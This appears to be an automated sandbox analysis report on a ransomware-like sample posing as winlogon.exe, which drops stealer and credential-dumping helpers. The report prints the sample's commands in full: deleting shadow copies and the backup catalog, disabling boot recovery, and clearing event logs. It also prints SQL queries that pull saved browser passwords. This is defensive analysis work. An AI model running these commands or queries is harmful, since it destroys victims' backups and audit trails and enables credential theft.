Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Command line argument: wbadmin.exe | 4_2_001416E9
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Command line argument: bcdedit.exe | 4_2_001416E9
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Command line argument: wevtutil.exe | 4_2_001416E9
PE file has an executable .text section and no other executable section
Source: winlogon.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini files
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Reads software policies
Source: C:\Users\user\Desktop\winlogon.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
SQL strings found in memory and binary data
Source: yegus.exe | Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;`R
Source: yegus.exe | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: yegus.exe | Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;
Source: yegus.exe | Binary or memory string: SELECT formSubmitURL, encryptedUsername, encryptedPassword FROM moz_logins;
Source: yegus.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: yegus.exe | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: yegus.exe | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Sample is known by Antivirus (Virustotal or Metascan)
Source: winlogon.exe | Virustotal: hash found
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\winlogon.exe 'C:\Users\user\Desktop\winlogon.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\yegus.exe 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\ucngw.exe 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\_usm.exe C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: unknown | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
Source: unknown | Process created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet
Source: unknown | Process created: C:\Windows\System32\wbengine.exe C:\Windows\system32\wbengine.exe
Source: unknown | Process created: C:\Windows\System32\vdsldr.exe C:\Windows\System32\vdsldr.exe -Embedding
Source: unknown | Process created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: unknown | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl System
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
Source: unknown | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl Security
Source: unknown | Process created: C:\Windows\System32\LogonUI.exe 'LogonUI.exe' /flags:0x0
Source: unknown | Process created: C:\Windows\System32\LogonUI.exe unknown
Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Users\user\AppData\Local\Temp\yegus.exe 123 \\.\pipe\122B85FE-84BD-45AB-AEE5-28D37FB4C464
Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Users\user\AppData\Local\Temp\ucngw.exe 123 \\.\pipe\33F83B68-FC3D-4C1F-B4AE-1329770D367B
Source: C:\Users\user\Desktop\winlogon.exe | Process created: C:\Users\user\AppData\Local\Temp\_usm.exe C:\Users\HERBBL~1\AppData\Local\Temp\_usm.exe
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\vssadmin.exe c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl System
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil.exe cl Security
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\winlogon.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)
Source: winlogon.exe | Static PE information: Section: .rsrc ZLIB complexity 1.00009145872
Source: yegus.exe.1.dr | Static PE information: Section: .rsrc ZLIB complexity 0.999364306084
Source: ucngw.exe.1.dr | Static PE information: Section: .rsrc ZLIB complexity 0.995655293367
Source: _yig.exe.1.dr | Static PE information: Section: .rsrc ZLIB complexity 1.00009145872
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100147C0 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,LocalFree | 3_2_100147C0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10013CB0 LoadLibraryW,GetModuleHandleW,NtQueryInformationProcess | 3_2_10013CB0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100145E0 GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb | 3_2_100145E0
Creates files inside the system directory
Source: C:\Windows\System32\wbadmin.exe | File created: C:\Windows\Logs\WindowsBackup
Detected potential crypto function
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D7989E
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D793F0
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6F6CE
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D7CF3F
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D61110
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D69330
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D61870
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D68EE0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01331370
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_0133E8FF
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013315E0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013310A0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01332B70
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013332D0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10064140
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100196A0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10029130
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1003C880
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10053C80
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10065870
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100804F0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10027050
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10006022
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10007870
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10005C30
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1006F810
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10036CD0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1003B6A0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10008D50
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10079459
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10022AD0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10078060
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10017050
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10002200
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1002DD28
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10074780
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10021F80
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1001EBB0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1001CFF0
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1008DE01
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100722E0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5FC90
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C60F40
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5D39F
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5FD20
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C61150
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5F3F0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5F6A0
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10004950
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100039B3
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_1000F898
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10003C10
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_1000B61E
Enables security privileges
Source: C:\Users\user\Desktop\winlogon.exe | Process token adjusted: Security
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\winlogon.exe | Code function: String function: 00D6B650 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 100071E0 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 10024C30 appears 105 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 10007480 appears 193 times
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: String function: 10008070 appears 167 times
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: String function: 00C51CA0 appears 32 times
PE file contains executable resources (Code or Archives)
Source: _wjg.exe.1.dr | Static PE information: Resource name: BINRES type: PE32 executable (console) Intel 80386, for MS Windows
Reads the hosts file
Source: C:\Users\user\Desktop\winlogon.exe | File read: C:\Windows\System32\drivers\etc\hosts (reported 6 times)
Sample file is different than original file name gathered from version info
Source: winlogon.exe | Binary or memory string: OriginalFilenamepsexec.cH vs winlogon.exe
Source: winlogon.exe | Binary or memory string: OriginalFilenamepsexesvc.exeH vs winlogon.exe
Sample reads its own file content
Source: C:\Users\user\Desktop\winlogon.exe | File read: C:\Users\user\Desktop\winlogon.exe
Tries to load missing DLLs
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D63920 LogonUserA,GetLastError,DeleteCriticalSection | 1_2_00D63920
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D65DD0 ExitProcess,Sleep,DeleteFileW,GetFileSize,WriteFile,GetFileAttributesW,CreateFileW,CloseHandle,GetModuleHandleW,GetModuleFileNameW,GetWindowsDirectoryW,CreateProcessW,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,TerminateProcess,CloseHandle | 1_2_00D65DD0
Contains functionality to inject threads in other processes
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D65DD0 ExitProcess,Sleep,DeleteFileW,GetFileSize,WriteFile,GetFileAttributesW,CreateFileW,CloseHandle,GetModuleHandleW,GetModuleFileNameW,GetWindowsDirectoryW,CreateProcessW,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,TerminateProcess,CloseHandle | 1_2_00D65DD0

Anti Debugging:

Contains functionality to register its own exception handler
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B598 SetUnhandledExceptionFilter | 1_2_00D6B598
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6AE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 1_2_00D6AE70
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B406 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 1_2_00D6B406
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D7009F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 1_2_00D7009F
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013347F1 SetUnhandledExceptionFilter | 2_2_013347F1
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013346A3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 2_2_013346A3
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013340FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 2_2_013340FB
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_013372DB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 2_2_013372DB
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100827CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 2_2_100827CB
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1008657C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 2_2_1008657C
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10083265 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 2_2_10083265
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C51BE9 SetUnhandledExceptionFilter | 3_2_00C51BE9
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C54CBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_00C54CBD
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C514CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 3_2_00C514CB
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C51A54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_00C51A54
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10001795 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_10001795
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_1000662D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 3_2_1000662D
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10001B37 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 3_2_10001B37
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_001417EA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 4_2_001417EA
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_0014333B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 4_2_0014333B
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Users\user\Desktop\winlogon.exe | System information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B406 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 1_2_00D6B406
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D643A0 GetVersionExW,LoadLibraryW,GetProcAddress,SHGetKnownFolderPath | 1_2_00D643A0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D70D28 mov eax, dword ptr fs:[00000030h] | 1_2_00D70D28
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01337F59 mov eax, dword ptr fs:[00000030h] | 2_2_01337F59
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10085756 mov eax, dword ptr fs:[00000030h] | 2_2_10085756
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C558EB mov eax, dword ptr fs:[00000030h] | 3_2_00C558EB
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_100051BB mov eax, dword ptr fs:[00000030h] | 3_2_100051BB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6A6F0 GetProcessHeap,RtlAllocateHeap | 1_2_00D6A6F0
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Process token adjusted: Debug

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D75F8F FindFirstFileExW | 1_2_00D75F8F
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_01339A82 FindFirstFileExW | 2_2_01339A82
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_10088620 FindFirstFileExA | 2_2_10088620
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_00C5850A FindFirstFileExW | 3_2_00C5850A
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Code function: 3_2_10008EEC FindFirstFileExA | 3_2_10008EEC
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: 4_2_00141441 wsprintfW,FindFirstFileW,GetProcessHeap,PathAppendW,GetProcessHeap,HeapAlloc,PathAppendW,PathAppendW,StrCmpCW,StrCmpCW,StrCmpCW,CreateFileW,GetFileSizeEx,CloseHandle,GetProcessHeap,HeapFree,FindNextFileW,FindClose | 4_2_00141441
Contains functionality to query system information
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_1000D3F0 GetSystemInfo | 2_2_1000D3F0
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: wbadmin.exe | Binary or memory string: Cluster service, and Hyper-V for more information.
Source: wbadmin.exe | Binary or memory string: An error occurred while preparing to back up Hyper-V data.
Program exit points
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | API call chain: ExitProcess graph end node
Queries a list of all running processes
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Process information queried: ProcessInformation
Contains functionality to enumerate running services
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Code function: OpenSCManagerW,EnumServicesStatusW,EnumServicesStatusW,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,EnumServicesStatusW,QueryServiceConfigW,OpenServiceW,QueryServiceConfigW,GetProcessHeap,HeapAlloc,ChangeServiceConfigW,QueryServiceConfigW,PathRemoveArgsW,GetProcessHeap,HeapFree,GetLastError,CloseServiceHandle,GetProcessHeap,HeapFree,CloseServiceHandle | 4_2_001412E8
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Thread delayed: delay time: 3600000
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\winlogon.exe | Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\_yig.exe
Source: C:\Users\user\Desktop\winlogon.exe | Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\_wjg.exe
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\_usm.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found evasive API chain checking for process token information
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\winlogon.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_1-13588
Source: C:\Users\user\AppData\Local\Temp\ucngw.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\winlogon.exe TID: 3392 | Thread sleep time: -60000s >= -60000s
Source: C:\Users\user\AppData\Local\Temp\yegus.exe TID: 3268 | Thread sleep time: -120000s >= -60000s
Source: C:\Users\user\AppData\Local\Temp\_usm.exe TID: 3300 | Thread sleep time: -3600000s >= -60000s
Source: C:\Windows\System32\wbadmin.exe TID: 3460 | Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\wbadmin.exe TID: 3460 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\wbengine.exe TID: 3492 | Thread sleep count: 89 > 30
Source: C:\Windows\System32\wbengine.exe TID: 3492 | Thread sleep time: -5340000s >= -60000s
Source: C:\Windows\System32\vdsldr.exe TID: 3520 | Thread sleep count: 57 > 30
Source: C:\Windows\System32\vdsldr.exe TID: 3520 | Thread sleep time: -3420000s >= -60000s
Source: C:\Windows\System32\vdsldr.exe TID: 3520 | Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\vds.exe TID: 3548 | Thread sleep count: 81 > 30
Source: C:\Windows\System32\vds.exe TID: 3548 | Thread sleep time: -4860000s >= -60000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\vdsldr.exe | Last function: Thread delayed

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Users\user\Desktop\winlogon.exe | Process information set: NOOPENFILEERRORBOX (reported 9 times)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (reported 9 times)
Creates files inside the volume driver (system volume information)
Source: C:\Windows\System32\wbengine.exe | File created: C:\System Volume Information\WindowsImageBackup

Language, Device and Operating System Detection:

Contains functionality to create pipes for IPC
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D634B0 wsprintfW,CreateNamedPipeW,CreateEventW,CloseHandle,ConnectNamedPipe,GetLastError,CloseHandle,CloseHandle,CloseHandle,WaitForSingleObject,GetOverlappedResult,CancelIo,CloseHandle,ReadFile,CloseHandle | 1_2_00D634B0
Contains functionality to query local / system time
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D74EF7 GetSystemTimeAsFileTime | 1_2_00D74EF7
Contains functionality to query time zone information
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Code function: 2_2_100879B6 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte | 2_2_100879B6
Contains functionality to query windows version
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D65970 GetVersionExW,__Stoull,__Stoull | 1_2_00D65970
Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\winlogon.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\winlogon.exe | Code function: 1_2_00D6B6CE cpuid | 1_2_00D6B6CE
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\secmod.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\cert8.db VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\yegus.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\4ah7hlda.default\key3.db VolumeInformation
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation

Behavior Graph

Behavior Graph ID: 46216 | Sample: winlogon.exe | Startdate: 12/02/2018 | Architecture: WINDOWS | Score: 100

Sample-level signatures:
  • Antivirus detection for dropped file
  • Antivirus detection for submitted file
  • May disable shadow drive data (uses vssadmin)
  • 3 other signatures
DNS: 252.0.0.224.in-addr.arpa -> Tries to resolve many domain names, but no domain seems valid

Process tree (numbers in parentheses are the counts shown next to the process in the graph):
winlogon.exe (8) started
  Network: 8.8.8.8, ports 49408, 50225, 51075 (GOOGLE-GoogleIncUS, United States) -> Tries to resolve many domain names, but no domain seems valid
  Network: 192.168.2.238, port 135 (unknown); 8 other IPs or domains
  Dropped: C:\Users\HERBBL~1\AppData\Local\...\_usm.exe (PE32); C:\Users\HERBBL~1\AppData\Local\...\yegus.exe (PE32); C:\Users\HERBBL~1\AppData\Local\...\ucngw.exe (PE32); 2 other files (none is malicious)
  Signatures: Contains functionality to inject threads in other processes; Contains functionality to inject code into remote processes
  _usm.exe started
    cmd.exe started -> May disable shadow drive data (uses vssadmin); Deletes shadow drive data (may be related to ransomware)
      vssadmin.exe started
    cmd.exe started -> Uses bcdedit to modify the Windows boot settings
      bcdedit.exe (1) started
      bcdedit.exe started
    cmd.exe started
    2 other processes
  yegus.exe (11) started -> Contains functionality to steal Internet Explorer form passwords; Contains functionality to steal Chrome passwords; Tries to harvest and steal browser information (history, passwords, etc)
  ucngw.exe started -> Contains functionality to dump credential hashes (LSA Dump)
wbengine.exe (2) started -> Creates files inside the volume driver (system volume information)
vdsldr.exe started
3 other processes
wbadmin.exe started (the graph text is cut off at this node; its parent is not shown)
